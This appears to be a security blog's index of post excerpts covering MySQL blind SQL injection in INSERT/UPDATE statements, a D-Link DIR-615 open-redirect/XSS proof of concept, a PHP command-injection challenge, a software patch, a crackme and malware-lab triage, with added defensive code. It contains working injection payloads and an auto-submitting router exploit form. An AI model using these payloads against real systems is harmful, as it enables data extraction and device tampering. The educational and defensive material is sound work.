MySQL Blind Injection in Insert and Update Statements

I'm not going to explain or write about blind injection in general; there are enough resources on the internet where you can learn it. You can check my previous post, where I explained the other types of injection in these statements in detail. Since some of you asked me how to perform blind injection, I thought of writing this post.

Boolean Based Blind Injection

We can use '+' or the bitwise OR operator in this scenario: if the condition is true the column is updated with '1', and if it is false it is updated with '0'.
I'm using binary search to make the search faster, with mid = (max + min) / 2.
However, I'm not sure if this is realistic.

update users set username = '0' | (substr(user(),1,1) regexp 0x5e5b6d2d7a5d) where id=14;
insert into users values (15,'osanda','0' | (substr(user(),1,1) regexp 0x5e5b6d2d7a5d));

Time Based Blind Injection

This approach is more realistic. Here we can use functions such as sleep() and benchmark(). As before, by using '+' or bitwise OR we can tell whether the condition is true or false from the delay when the row is updated or inserted.

update users set username = '0' | if((substr(user(),1,1) regexp 0x5e5b6d2d7a5d), sleep(5), 1) where id=15;
insert into users values (16,'osanda','0' | if((substr(user(),1,1) regexp 0x5e5b6d2d7a5d), sleep(5), 1));

Conclusion

The same can be applied to DELETE statements as well, but that injection is not realistic. There are many methods you can follow using the above syntax, and you can develop your own tool to automate the process and improve the efficiency of the search.
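As an added example (not part of the original post), the two sides of the technique above from a defender's view: a heuristic that flags the post's INSERT/UPDATE payload shapes in general-log-style statement text, and the parameterised statement that removes the injection point altogether. The statements, the in-memory table and the reduced boolean payload in the unsafe demo are constructed for this example; the database is sqlite3 standing in for MySQL, so MySQL-only functions (user(), sleep(), REGEXP) are only matched as text, not executed.

```python
import re
import sqlite3

# Constructed sample statements, written the way they would appear in a MySQL
# general query log: the two injected forms from the post plus a benign update.
SAMPLE_STATEMENTS = [
    "update users set username = '0'|if((substr(user(),1,1) regexp 0x5e5b6d2d7a5d), sleep(5), 1) where id=15",
    "insert into users values (16,'osanda','0'| (substr(user(),1,1) regexp 0x5e5b6d2d7a5d))",
    "update users set username = 'osanda' where id=15",
]

# Heuristic markers that an application's own INSERT/UPDATE value list should
# never contain: time-delay functions, IF() evaluation, a hex pattern handed to
# REGEXP, or a string literal bitwise-OR'ed with a parenthesised expression.
SUSPICIOUS = re.compile(
    r"\b(?:sleep|benchmark)\s*\(|\bif\s*\(|\bregexp\s+0x[0-9a-f]+|'\s*\|\s*\(",
    re.IGNORECASE,
)


def flag_blind_injection(statement: str) -> bool:
    """True when an INSERT or UPDATE carries markers of boolean- or time-based blind injection."""
    head = statement.lstrip().lower()
    if not head.startswith(("insert", "update")):
        return False
    return SUSPICIOUS.search(statement) is not None


def flagged_statements(statements) -> list:
    """Filter a batch of logged statements down to the suspicious ones."""
    return [s for s in statements if flag_blind_injection(s)]


def demo_conn() -> sqlite3.Connection:
    """In-memory table standing in for the post's users table (sqlite3, not MySQL)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT)")
    conn.execute("INSERT INTO users VALUES (14, 'alice')")
    return conn


def set_username_unsafely(conn, user_id: int, value: str):
    """The pattern the post relies on: user input spliced into the SQL text.

    With a value such as 0' | (1=1) --  the stored column becomes the result of
    the expression rather than the text that was supplied."""
    conn.execute(f"UPDATE users SET username = '{value}' WHERE id = {user_id}")
    return conn.execute("SELECT username FROM users WHERE id = ?", (user_id,)).fetchone()[0]


def set_username_safely(conn, user_id: int, value: str):
    """Bound parameter: the value is data, so a '0' | (...) expression is stored literally."""
    conn.execute("UPDATE users SET username = ? WHERE id = ?", (value, user_id))
    return conn.execute("SELECT username FROM users WHERE id = ?", (user_id,)).fetchone()[0]


if __name__ == "__main__":
    for s in flagged_statements(SAMPLE_STATEMENTS):
        print("flagged:", s)
    payload = "0' | (1=1) -- "
    print("unsafe stored:", set_username_unsafely(demo_conn(), 14, payload))
    print("safe stored:  ", set_username_safely(demo_conn(), 14, payload))
```

The regular expression is a triage heuristic, not a parser: IF() and bitwise OR are legal in application SQL, so tune it against your own query baseline before alerting on it.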

Lab01-01 Analysis

In my leisure time I like reading the book Practical Malware Analysis, and I thought of sharing my analysis of the lab sections. You can find detailed answers in the book as well.

  • Lab01-01.dll – https://virustotal.com/en/file/f50e42c8dfaab649bde0398867e930b86c2a599e8db83b8260393082268f2dba/analysis/
  • Lab01-01.exe – https://virustotal.com/en/file/58898bd42c5bd3bf9b1389f0eee5b39cd59180e8370eb9ea838a0b327bd6fe47/analysis/

Lab01-01.dll Analysis

If we have a look at the imports of the “Lab01-01.dll” file, we can see that it uses network functions from “ws2_32.dll”. We can suspect that this file is responsible for communicating with the attacker.
imports-of-dll

But if we have a look at the exports section, we see nothing, which is strange for a DLL.
no-exports-dll
(more…)
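An added example, not from the post or the book: a pure-Python triage function that reads the COFF characteristics and the data directory table of a PE image, so the two observations above (DLL flag set, import directory present, export directory empty) can be checked in a script rather than by eye. The sample bytes are a constructed minimal PE32 header, not the lab file. It reads only the directory table; resolving the imported names (ws2_32.dll and friends) would additionally require mapping RVAs through the section table, which is out of scope here.

```python
import struct

# Order of the IMAGE_DATA_DIRECTORY entries in the optional header.
DIRECTORY_NAMES = ["export", "import", "resource", "exception", "security",
                   "basereloc", "debug", "architecture", "globalptr", "tls",
                   "load_config", "bound_import", "iat", "delay_import",
                   "com_descriptor", "reserved"]
IMAGE_FILE_DLL = 0x2000   # Characteristics bit: image is a DLL


def pe_triage(data: bytes) -> dict:
    """Parse the DOS/PE/COFF/optional headers and report DLL flag and directory presence."""
    if data[:2] != b"MZ":
        raise ValueError("missing MZ header")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    coff = e_lfanew + 4
    (_machine, _n_sections, _timestamp, _sym_ptr, _n_syms,
     _opt_size, characteristics) = struct.unpack_from("<HHIIIHH", data, coff)
    opt = coff + 20
    magic = struct.unpack_from("<H", data, opt)[0]
    if magic == 0x10B:            # PE32
        n_dirs_off, dirs_off = opt + 92, opt + 96
    elif magic == 0x20B:          # PE32+
        n_dirs_off, dirs_off = opt + 108, opt + 112
    else:
        raise ValueError("unknown optional header magic 0x%x" % magic)
    n_dirs = struct.unpack_from("<I", data, n_dirs_off)[0]
    dirs = {}
    for i in range(min(n_dirs, len(DIRECTORY_NAMES))):
        rva, size = struct.unpack_from("<II", data, dirs_off + 8 * i)
        dirs[DIRECTORY_NAMES[i]] = (rva, size)
    return {
        "is_dll": bool(characteristics & IMAGE_FILE_DLL),
        "has_exports": dirs.get("export", (0, 0))[1] != 0,
        "has_imports": dirs.get("import", (0, 0))[1] != 0,
        "directories": dirs,
    }


def triage_note(data: bytes) -> str:
    """One-line verdict in the spirit of the post's observation."""
    t = pe_triage(data)
    if t["is_dll"] and t["has_imports"] and not t["has_exports"]:
        return "DLL with an import table but no export table: unusual, worth a closer look"
    return "nothing unusual in the directory table"


def build_sample_dll() -> bytes:
    """Constructed minimal PE32 header: a DLL with an import directory and no export directory."""
    dos = b"MZ" + b"\0" * 58 + struct.pack("<I", 64)          # e_lfanew = 64
    # Machine i386, 0 sections, 224-byte optional header,
    # Characteristics = EXECUTABLE_IMAGE | 32BIT_MACHINE | DLL.
    coff = struct.pack("<HHIIIHH", 0x14C, 0, 0, 0, 0, 224, 0x2102)
    opt = bytearray(224)
    struct.pack_into("<H", opt, 0, 0x10B)                      # PE32 magic
    struct.pack_into("<I", opt, 92, 16)                        # NumberOfRvaAndSizes
    struct.pack_into("<II", opt, 96 + 8 * 1, 0x3000, 0x50)     # import directory only
    return dos + b"PE\0\0" + coff + bytes(opt)


if __name__ == "__main__":
    print(triage_note(build_sample_dll()))
```

On a real sample, pass the file contents to pe_triage() and compare its verdict with what your PE viewer shows; an empty export directory on a DLL is exactly the oddity the post points at.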

Patching Windows Media Player

I'm writing this post at the request of @rudr4_sarkar. This is a very simple patch that lets you open multiple instances of wmplayer. The player uses the 'CreateMutexW' API to create a mutex object with the name “Local\Microsoft_WMP_70_CheckForOtherInstanceMutex”.

screenshot_2

The pseudo code would be something like this:
[code language="c"]
#include <windows.h>

// The backslash must be escaped inside a C string literal.
HANDLE hMutex = CreateMutexW(NULL, FALSE, L"Local\\Microsoft_WMP_70_CheckForOtherInstanceMutex");
if (GetLastError() == ERROR_ALREADY_EXISTS) {
    // another instance already owns the mutex: refuse to start a second one
}
[/code]
You just need to patch the 'JNZ' into a 'JMP' instruction, so that it always jumps to the good boy 🙂

disass (more…)

D-Link DIR-615 Open Redirection and XSS

D-Link DIR-615
Hardware Version: E3
Firmware Version: 5.10

The 'apply.cgi' file was vulnerable to Open Redirection and XSS. Many other CGI files on the router also rely on this functionality of 'apply.cgi', for example 'ping_response.cgi'.

Open Redirection

apply.cgi

<html>
<!-- @OsandaMalith -->
  <body>
    <form action="http://192.168.0.1/apply.cgi" method="POST" id="exploit">
      <input type="hidden" name="html_response_page" value="https://google.lk" />
      <input type="hidden" name="html_response_return_page" value="tools_vct.asp" />
      <img src=x onerror="exploit.submit()"/>
    </form>
  </body>
</html>

(more…)
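An added example, not part of the post or the vendor firmware, of how a handler like apply.cgi can validate the html_response_page parameter so that it can neither redirect off the device nor inject markup. The allowlist of page names (other than tools_vct.asp, which appears in the PoC above) is an assumption made for the example; the checks cover the usual ways a "local page" value turns into an external or script URL.

```python
import html
from urllib.parse import urlsplit

# Constructed allowlist: the only page names the response is allowed to go back to.
# tools_vct.asp comes from the PoC; the other two are assumed for this example.
ALLOWED_PAGES = frozenset({"tools_vct.asp", "index.asp", "status.asp"})


def is_safe_redirect_target(value: str) -> bool:
    """Accept only a bare page name from the allowlist; reject anything that could leave the site."""
    if not value or len(value) > 64:
        return False
    if any(ord(c) < 0x20 or ord(c) == 0x7F for c in value):
        return False                     # CR/LF here would also allow header injection
    if value.startswith(("//", "/\\", "\\")):
        return False                     # scheme-relative forms that browsers follow off-site
    parts = urlsplit(value)
    if parts.scheme or parts.netloc:
        return False                     # absolute URL, javascript:, data: ...
    return parts.path == value and value in ALLOWED_PAGES


def response_page(requested: str, default: str = "index.asp") -> str:
    """Resolve the html_response_page parameter to a page the device actually serves."""
    return requested if is_safe_redirect_target(requested) else default


def render_link(requested: str) -> str:
    """Emit the page name into HTML with escaping, closing the XSS side of the bug."""
    page = response_page(requested)
    return '<a href="%s">%s</a>' % (html.escape(page, quote=True), html.escape(page))


if __name__ == "__main__":
    for candidate in ("tools_vct.asp", "https://google.lk", "//google.lk", "javascript:alert(1)"):
        print(repr(candidate), "->", response_page(candidate))
```

The allowlist does the real work; the scheme, netloc and control-character checks are there so that a later "just allow any local path" relaxation does not silently reopen the redirect.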

Random CrackMe

This is an interesting crackme I found randomly. You can download it from here: http://www.mediafire.com/file/5r3a3uqsg1pbp4v/CrackMe1.zip

The algorithm uses the PID of the application in the serial-key calculation. It also uses the 'GetComputerName' and 'GetUserName' Win32 APIs when generating the serial key: the lengths of both results are used as loop bounds and each ASCII value is added up, and these sums feed into the final serial-key calculation.
This graph is from the OllyGraph plugin.



(more…)

Journey into eWPTX

eWPTX

At the request of some people I thought of writing a small review of this course and certificate. The course is WAPTx – Web Application Penetration Testing eXtreme. The certificate is eWPTX – eLearnSecurity Web application Penetration Tester eXtreme. Last year I completed eWPT; you can check that post here.
This course is very up to date compared to other web application penetration testing courses. I learned many things I didn't know about different web application technologies. There are many languages and technologies in the world of web applications, and it's very hard to master them all. This course, however, covers many advanced attack methodologies.

The exam, however, is “hard”: no matter whether you are a web developer or a networking guy, you need to make sure you understand how each vulnerability is exploited and also how to bypass filters. You cannot just fire up a tool and expect results. Make sure you understand manual exploitation, because exploitation is not always straightforward in real-world applications.

I actually loved the exam: it was a very small web app, but with lots of unseen holes. My experience with SQL injections came in handy in the exam 😉

If you are looking for a next-level certification in web application hacking, I would recommend this course.

It was a very fast year! 2016 ended nicely, as I planned: by October I had completed eCPPT, by November eCRE, and by December eWPTX 🙂 Nothing is impossible if you try hard 😉

Thank you everyone for your feedback and messages!

cert

[tweet https://twitter.com/eLearnSecurity/status/814775586640068608]

PHP Feature or 0day?

Today one of my friends @RakeshMane10 gave me a challenge which I found pretty interesting.

[code language="php"]
<?php
// Note: 'error_displays' is not a PHP ini directive (the directive is
// 'display_errors'), so this call has no effect; kept as it appears in the challenge.
ini_set('error_displays', 0);
// The input is escaped for an HTML context only, but is then used in a shell context.
$ip = htmlspecialchars($_GET['url'], ENT_QUOTES);
$f = fsockopen($ip, 80, $errno, $errstr, 5);
if($f) {
    $result = shell_exec('ping -c 1 ' . $ip);
    echo '<div class="alert alert-success">' . nl2br($result) . '</div>';
} else {
    echo '<div class="alert alert-danger">' . $errstr . '</div>';
}
?>
[/code]
(more…)
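As an added example (mine, not the challenge author's solution, and it does not answer the "feature or 0day" question), the defensive counterpart to the snippet above: htmlspecialchars() escapes for an HTML context, while the value is consumed by a shell, so the fix is to validate the input as a host in its own right and to invoke ping without a shell at all. Written in Python for consistency with the other examples on this page; the function names are my own.

```python
import ipaddress
import re
import subprocess

# One RFC 1123 hostname label: 1-63 chars, letters/digits/hyphen, no leading or trailing hyphen.
HOSTNAME_LABEL = re.compile(r"^(?!-)[A-Za-z0-9-]{1,63}(?<!-)$")


def validate_host(value: str) -> str:
    """Return the value only if it is a literal IP address or a syntactically valid hostname.

    Raises ValueError otherwise, so shell metacharacters, whitespace and
    HTML-escaped sequences never get anywhere near a command line."""
    if not value or len(value) > 253:
        raise ValueError("empty or too long")
    try:
        return str(ipaddress.ip_address(value))          # IPv4 or IPv6 literal
    except ValueError:
        pass
    labels = value.rstrip(".").split(".")
    if labels and all(HOSTNAME_LABEL.match(label) for label in labels):
        return value
    raise ValueError("not an IP address or hostname")


def ping_argv(host: str) -> list:
    """Build the argv for a single ping; validation happens first, and no shell is involved."""
    return ["ping", "-c", "1", validate_host(host)]


def run_ping(host: str, timeout: float = 10.0) -> str:
    """Run ping as an argument vector (no shell interpretation) and return its stdout."""
    result = subprocess.run(ping_argv(host), capture_output=True, text=True, timeout=timeout)
    return result.stdout


def is_acceptable_host(value: str) -> bool:
    """Boolean convenience wrapper around validate_host for form handling."""
    try:
        validate_host(value)
        return True
    except ValueError:
        return False


if __name__ == "__main__":
    # Constructed inputs: two legitimate targets and a few that must be refused.
    for candidate in ("192.168.0.1", "example.com", "127.0.0.1; id", "$(id)", "a b.com"):
        print(repr(candidate), "->", is_acceptable_host(candidate))
```

Because the host is checked against a positive grammar rather than a list of bad characters, the question of which characters htmlspecialchars() does or does not touch stops mattering; run_ping() needs a ping binary, so it is left out of the automated checks below.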